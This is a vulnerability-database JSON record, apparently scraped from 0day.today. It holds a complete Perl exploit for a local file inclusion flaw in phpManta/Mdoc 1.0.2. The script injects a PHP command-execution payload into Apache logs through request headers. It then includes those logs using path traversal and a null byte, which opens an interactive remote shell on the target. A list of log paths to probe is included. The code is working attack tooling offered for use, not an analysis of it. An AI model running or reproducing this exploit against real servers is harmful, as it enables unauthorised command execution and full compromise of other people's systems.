{"id": "1337DAY-ID-1124", "lastseen": "2018-01-03T19:14:36", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2018-01-03T19:14:36", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1124.NASL", "SUSE_SU-2019-2730-1.NASL", "NEWSTART_CGSL_NS-SA-2019-0135_PROCPS.NASL", "NEWSTART_CGSL_NS-SA-2019-0138_PYTHON-PARAMIKO.NASL", "OPENSUSE-2019-2379.NASL", "OPENSUSE-2019-2376.NASL", "ARISTA_EOS_SA0030.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220181198", "OPENVAS:1361412562311220181340", "OPENVAS:1361412562310852811", "OPENVAS:1361412562311220201124", "OPENVAS:1361412562311220191423", "OPENVAS:1361412562311220171240", "OPENVAS:1361412562311220171239", "OPENVAS:1361412562311220191380", "OPENVAS:1361412562311220181274", "OPENVAS:1361412562311220181199"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2376-1", "OPENSUSE-SU-2019:2379-1"]}], "modified": "2018-01-03T19:14:36", "rev": 2}, "vulnersScore": 1.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1124", "description": "Exploit for unknown platform in category web applications", "title": "phpManta <= 1.0.2 (view-sourcecode.php) Local File Include Exploit", "cvelist": [], "sourceData": "==================================================================\r\nphpManta <= 1.0.2 (view-sourcecode.php) Local File Include Exploit\r\n==================================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#[Script Name: phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit\r\n#[Coded by : ajann\r\n#[Author : ajann\r\n#[Contact : :(\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n@apache=(\r\n\"../../../../../var/log/httpd/access_log\",\r\n\"../../../../../var/log/httpd/error_log\",\r\n\"../apache/logs/error.log\",\r\n\"../apache/logs/access.log\",\r\n\"../../apache/logs/error.log\",\r\n\"../../apache/logs/access.log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../logs/error.log\",\r\n\"../logs/access.log\",\r\n\"../../logs/error.log\",\r\n\"../../logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../etc/httpd/logs/access_log\",\r\n\"../../../../../etc/httpd/logs/access.log\",\r\n\"../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../etc/httpd/logs/error.log\",\r\n\"../../.. /../../var/www/logs/access_log\",\r\n\"../../../../../var/www/logs/access.log\",\r\n\"../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../var/log/apache/access_log\",\r\n\"../../../../../var/log/apache/access.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/www/logs/error_log\",\r\n\"../../../../../var/www/logs/error.log\",\r\n\"../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../var/log/apache/error_log\",\r\n\"../../../../../var/log/apache/error.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/log/error_log\"\r\n);\r\nif (@ARGV < 3){\r\nprint \"\r\n[========================================================================\r\n[// phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit\r\n[// Usage: manta.pl [target] [path] [apachepath]\r\n[// Example: manta.pl victim.com /manta/ ../logs/error.log\r\n[// Vuln&Exp : ajann\r\n[========================================================================\r\n\";\r\nexit();\r\n}\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$apachepath=$ARGV[2];\r\n\r\nprint \"Injecting code in log files...\\n\";\r\n$CODE=\"<?php ob_clean();system(\\$HTTP_COOKIE_VARS[cmd]);die;?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connect Failed.\\n\\n\";\r\nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"User-Agent: \".$CODE.\"\\r\\n\";\r\nprint $socket \"Host: \".$host.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\nprint \"Write END to exit!\\n\";\r\nprint \"IF not working try another apache path\\n\\n\";\r\n\r\nprint \"[shell] \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connect Failed.\\n\\n\";\r\n print $socket \"GET \".$path.\"Mdoc/view-sourcecode.php?file=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"[shell] \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "published": "2006-11-09T00:00:00", "references": [], "reporter": "ajann", "modified": "2006-11-09T00:00:00", "href": "https://0day.today/exploit/description/1124", "immutableFields": []}

{}